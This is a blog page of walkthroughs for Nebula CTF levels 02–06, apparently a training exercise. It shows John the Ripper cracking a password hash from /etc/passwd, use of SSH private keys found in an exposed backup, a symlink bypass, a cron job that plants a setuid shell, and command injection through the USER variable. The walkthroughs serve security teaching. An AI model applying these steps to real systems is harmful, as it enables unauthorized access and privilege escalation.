"Whatever Pages"
Blog About RSS

The legacy of unix system

Mar 27, 2015 • Category: Ctf, nebula

         Nebula 06 Agenda: “The flag06 account credentials came from a legacy unix system.”


If we’ll digging in flag06 home, we’ll find nothing interesting. However, if we try to grab users data from “/etc/passwd” (a text file that describes user login accounts for the system) it turns out that flag06 encrypted password is not stored in “/etc/shadow” (which instead of passwd is readable by superuser only):

1 level06@nebula:/home/flag06$ cat /etc/passwd | grep "flag06"
2 flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

To crack that password hash, let’s try to use old school pop-tool - “JTR”. But firstly need to install it as nebula account (pw the same). 

 1 level06@nebula:/home/flag06$ su nebula
 2 Password: 
 3 nebula@nebula:/home/flag06$ sudo apt-get install john
 4 [sudo] password for nebula: 
 5 Reading package lists... Done
 6 .................................................
 7 Setting up john (1.7.8-1) ...
 8 nebula@nebula:/home/flag06$ exit
 9 exit
10 
11 level06@nebula:/home/flag06$ john /etc/passwd
12 Created directory: /home/level06/.john
13 Loaded 1 password hash (Traditional DES [128/128 BS SSE2])
14 hello            (flag06)
15 guesses: 1  time: 0:00:00:00 100% (2)  c/s: 25100  trying: 12345 - biteme
16 Use the "--show" option to display all of the cracked passwords reliably

Success! At line 14 of the above codeblock, we can see that the flag06 account’s password is - “hello” phrase.

Weak permissions

Mar 3, 2015 • Category: Ctf, nebula

         Nebula 05 Agenda: “Check the flag05 home directory. You are looking for weak directory permissions”


 1 level05@nebula:~$ cd /home/flag05
 2 level05@nebula:/home/flag05$ ls -la
 3 total 5
 4 drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 .
 5 drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
 6 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .backup
 7 -rw-r--r-- 1 flag05 flag05   220 2011-05-18 02:54 .bash_logout
 8 -rw-r--r-- 1 flag05 flag05  3353 2011-05-18 02:54 .bashrc
 9 -rw-r--r-- 1 flag05 flag05   675 2011-05-18 02:54 .profile
10 drwx------ 2 flag05 flag05    70 2011-11-20 20:13 .ssh
11 
12 level05@nebula:/home/flag05$ cd ./.backup/
13 level05@nebula:/home/flag05/.backup$ ls -la
14 total 2
15 drwxr-xr-x 2 flag05 flag05    42 2011-11-20 20:13 .
16 drwxr-x--- 4 flag05 level05   93 2012-08-18 06:56 ..
17 -rw-rw-r-- 1 flag05 flag05  1826 2011-11-20 20:13 backup-19072011.tgz
18 
19 level05@nebula:/home/flag05/.backup$ file backup-19072011.tgz
20 backup-19072011.tgz: gzip compressed data, from Unix, last modified: 
21 Tue Jul 19 02:38:48 2011
22 
23 level05@nebula:/home/flag05/.backup$ mkdir /tmp/flag05/
24 level05@nebula:/home/flag05/.backup$ cd /tmp/flag05/
25 
26 level05@nebula:/tmp/flag05$ tar -xzvf /home/flag05/.backup/backup-19072011.tgz
27 .ssh/
28 .ssh/id_rsa.pub
29 .ssh/id_rsa
30 .ssh/authorized_keys

Therefore the “weak” directory was the hidden “/home/flag05/.backup” folder. To extract archive we used tar utility (line #26). And as result we have public (“id_rsa.pub”) and private (“id_rsa”) ssh rsa keys. In an asymmetric key encryption scheme, anyone can encrypt messages using the public key, but only the holder of the paired private key can decrypt. Security depends on the secrecy of the private key. Now we can use OpenSSH SSH client with usage of identity(private key) to login as “flag05” user:

1 level05@nebula:/tmp/flag05$ ssh -i ./.ssh/id_rsa flag05@localhost
2 
3 flag05@nebula:~$ getflag
4 You have successfully executed getflag on a target account

Bypassed restriction

Feb 22, 2015 • Category: Ctf, nebula

         Nebula 04 Agenda: “This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it :)”


After code review we can note that strstr makes check that filename which one we passed as input doesn’t contain substring “token” or as result you’ll get “EXIT_FAILUREstatus. As we have no permissions to rename/copy/move that token, to bypass restriction we’ll use symbolic link (ln -s).

 1 level04@nebula:~$ cd /home/flag04
 2 level04@nebula:/home/flag04$ ls -la
 3 total 13
 4 drwxr-x--- 2 flag04 level04   93 2011-11-20 21:52 .
 5 drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
 6 -rw-r--r-- 1 flag04 flag04   220 2011-05-18 02:54 .bash_logout
 7 -rw-r--r-- 1 flag04 flag04  3353 2011-05-18 02:54 .bashrc
 8 -rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
 9 -rw-r--r-- 1 flag04 flag04   675 2011-05-18 02:54 .profile
10 -rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
11 
12 level04@nebula:/home/flag04$ mkdir /tmp/level04
13 level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04/flag
14 level04@nebula:/home/flag04$ ./flag04 /tmp/level04/flag
15 
16 06508b5e-8909-4f38-b630-fdb148a848a2

And finally, we can use the hash at line 16 as a passphrase for “flag04” user. After obtaining the access you should know what to do =)

Scheduled job

Feb 20, 2015 • Category: Ctf, nebula

         Nebula 03 Agenda: “Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes.”


The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals.

 1 level03@nebula:/home/flag03$ ls -la
 2 total 6
 3 drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
 4 drwxr-xr-x 1 root   root      80 2012-08-27 07:18 ..
 5 -rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
 6 -rw-r--r-- 1 flag03 flag03  3353 2011-05-18 02:54 .bashrc
 7 -rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
 8 drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
 9 -rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh
10 
11 level03@nebula:/home/flag03$ cat ./writable.sh
12 
13 #!/bin/sh
14 
15 for i in /home/flag03/writable.d/* ; do
16         (ulimit -t 5; bash -x "$i")
17         rm -f "$i"
18 done

After a small overwiev, as we can see that cron launches “writable.sh”, which in turn executes and cleans each script from “writable.d” directory. In last but not least order, it also notable the ulimit restriction (in our case, limit the usage of maximum amount of cpu time to 5 seconds).

The first way that comes to mind to solve it, based on writing the simplest shell:

1 level03@nebula:/home/flag03$ mkdir /tmp/level03
2 level03@nebula:/home/flag03$ touch /tmp/level03/shell.c
3 level03@nebula:/home/flag03$ vi /tmp/level03/shell.c
1 int main(int argc, char **argv, char **envp)
2 {
3   system("/bin/sh");
4   return 0;
5 }

And after that, setup the task for cron scheduler.

1 level03@nebula:/home/flag03$ cd writable.d/
2 level03@nebula:/home/flag03/writable.d$ cat > cmd.sh
3 
4 gcc /tmp/level03/shell.c -o /home/flag03/shell;
5 chmod +s /home/flag03/shell;

At line 4, we use gcc compiler to compile our source into ELF. Ok, now let’s pay a few minutes (more precisely - 3, in nebula-5) for cron to have the harvest time:

 1 level03@nebula:/home/flag03$ ls -la ./shell && file ./shell                     
 2 
 3 -rwsrwsr-x 1 flag03 flag03 7161 2015-03-08 09:33 ./shell
 4 ./shell: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), 
 5 dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
 6 
 7 level03@nebula:/home/flag03$ ./shell
 8 sh-4.2$ whoami
 9 flag03
10 sh-4.2$ getflag
11 You have successfully executed getflag on a target account

There’s also exist the easier way:

1 level03@nebula:/home/flag03/writable.d$ cat > enother.sh
2 getflag > /tmp/flag
3 
4 level03@nebula:/home/flag03/writable.d$ cat /tmp/flag
5 You have successfully executed getflag on a target account

Don’t forget to clean-up:

1 level03@nebula:~$ rm -r /tmp/level03
2 level03@nebula:~$ rm /tmp/flag

Command-command-command

Feb 2, 2015 • Category: Ctf, nebula

         Nebula 02 Agenda: “There is a vulnerability in the program that allows arbitrary programs to be executed, can you find it?”


Hovewer, what we have notice after code review at this stage? The essential thing is usage of “char *getenv(const char *name)function, which get an environment variable (…obviously, thanks cap!), and returns a pointer to the corresponding value string. And the next major usage - “int system(const char *command)”. It’s executes a command specified in “*command” by calling “/bin/sh -c” command (command-command-command =)), and returns after the command has been completed.

Well, is there some clue? Definitely, the point is on replacing $USER variable value with desirable tricky command (again =)).

1 level02@nebula:~$ export USER=";getflag;"
2 #OR
3 level02@nebula:~$ export USER="&getflag;"
4 #OR
5 level02@nebula:~$ export USER="|getflag;"
6 #OR
7 level02@nebula:~$ export USER="&& getflag;"
  • export - set export attribute for shell variables.
  • ”;” - some kind of command separator.
  • “& (ampersand)” - is a builtin control operator used to fork processes. From the Bash man page, “If a command is terminated by the control operator &, the shell executes the command in the background in a subshell”.
  • “&&” - Logical AND, lets you do something based on whether the previous command completed successfully
  • ”|” - bitwise OR, will allow the successive command to execute if the preceding fails.
  • quotes is used to escape special chars in env var value.

That’s it! The final point, execute “/home/flag02/flag02” to check out the result.

Subscribe via RSS.